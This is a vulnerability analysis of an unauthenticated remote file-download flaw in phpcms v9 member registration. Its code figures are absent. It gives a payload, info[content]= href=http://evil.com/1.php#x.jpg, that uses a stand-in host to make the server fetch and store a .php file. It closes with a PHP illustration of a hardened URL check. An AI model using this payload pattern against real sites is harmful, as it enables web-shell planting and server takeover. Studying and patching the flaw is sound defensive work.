This is said to be a 0day that circulated in the underground for about half a year before being disclosed recently. It sits in the member registration page, so the vulnerability can be exploited without logging in, which makes it all the more powerful.
2. Vulnerability analysis:
Before following the registration page, look at the member registration settings of a default phpcms v9 installation, kept in the member_setting.cache.php file; its content is as follows:
Now to the point: the registration page code is in phpcms\modules\member\index.php.
The entry point is the register function:
This part of the logic is controlled by the member registration settings file shown above; skip ahead to line 130:
In the last line, $user_model_info is the array obtained after processing the info variable submitted by the user. Tracing where $user_model_info comes from leads to the get method in caches\caches_model\caches_data\member_input.class.php:
$this->fields is defined in the constructor; the code reads the content of a cache file:
The variable $modelid is defined in phpcms\modules\member\index.php and can be set directly through a POST request.
The variable $modelid controls which file is read: a value of 1 reads the cache configuration from model_field_1.cache.php. Following that file, the definition at line 262 is:
Back in the get method, $value = $this->$func($field, $value) effectively becomes $value = editor($field, $value), where both $field and $value are controllable: they are the key and the value of the POSTed info array.
Then follow the editor method:
Continue into the download method of the attachment class, called in the penultimate line. Note that the first argument $field, the key of the POSTed info array, is hard-coded to content, so the payload has to be submitted in the form info[content]=xxxx. In the phpcms\libs\classes\attachment.class.php file:
The regular expression on the penultimate line in the figure roughly means: if the url does not end with one of the image suffixes gif|jpg|jpeg|bmp|png, the original url is returned as-is and the function exits without ever reaching the vulnerable code. (The regex takes the value matched by the third parenthesized group; for example, submitting info[content]= href=http://evil.com/1.jpg gives the match http://evil.com/1.jpg.)
The code then goes to the fillurl method to complete the url:
Note line 300: anyone who reads PHP will see from the # check above that when the user-submitted url contains a #, only the part before the # is taken as the url.
The rest of the code is omitted; what it does is strip the leading http:// from the url, collapse multiple / into a single /, and finally return the url with http:// prepended. So if the user submits info[content]= href=http://evil.com/1.php#x.jpg, the result returned after fillurl processing is http://evil.com/1.php. Is that not a problem? :)
Back to the download method, whose analysis is not yet complete: the next step takes the file suffix with fileext:
It turns out the suffix is whatever follows the last dot. Combined with the analysis above, the variable $file that enters this logic is http://evil.com/1.php, so the resulting file suffix becomes php.
Continuing through the download method, the code flow reaches line 171:
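The root cause in the steps just traced is ordering: the image-suffix regex runs on the raw url, while the # truncation and the extension extraction run afterwards on a different string. The following PHP is an added illustration written for this page, not phpcms code: vulnerable_ext() is an assumed simplification of that flow, and safe_image_ext() shows the check a maintainer would want instead, validating the parsed url and the extension of the path that would actually be fetched. The sample inputs are constructed.

```php
<?php
// Added illustration, not phpcms code. Models the order-of-operations flaw
// described above and a hardened check that validates the normalised URL.

const IMAGE_EXTS = ['gif', 'jpg', 'jpeg', 'bmp', 'png'];

// Assumed simplification of the vulnerable flow: the suffix regex is applied
// to the raw URL, and only afterwards is everything after '#' discarded and
// the extension taken from the last dot of what remains.
function vulnerable_ext(string $url): ?string {
    if (!preg_match('/\.(gif|jpg|jpeg|bmp|png)$/i', $url)) {
        return null;                          // no image suffix: URL left alone
    }
    $url = explode('#', $url, 2)[0];          // fillurl-style truncation at '#'
    $url = preg_replace('#^https?://#i', '', $url);
    return strtolower(pathinfo($url, PATHINFO_EXTENSION));   // last dot wins
}

// Hardened form: parse first, reject fragments and queries, then whitelist the
// extension of the path component that would really be downloaded and stored.
function safe_image_ext(string $url): ?string {
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'], $p['path'])) {
        return null;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return null;
    }
    if (isset($p['fragment']) || isset($p['query'])) {
        return null;                          // '#' or '?' in a fetch URL: reject
    }
    $ext = strtolower(pathinfo($p['path'], PATHINFO_EXTENSION));
    return in_array($ext, IMAGE_EXTS, true) ? $ext : null;
}

// Constructed sample inputs: a legitimate image URL and the pattern from the
// analysis above (image suffix only in the fragment).
$samples = [
    'http://example.com/pic.jpg',       // vulnerable=jpg  safe=jpg
    'http://example.com/1.php#x.jpg',   // vulnerable=php  safe=NULL
];
foreach ($samples as $u) {
    printf("%-34s vulnerable=%-5s safe=%s\n", $u,
        var_export(vulnerable_ext($u), true),
        var_export(safe_image_ext($u), true));
}
```

Validating the url is only one layer: the stored file name should never carry a user-derived extension outside the whitelist, and the fetched bytes should be checked as an image (for example with getimagesize()) before anything is written under the web root.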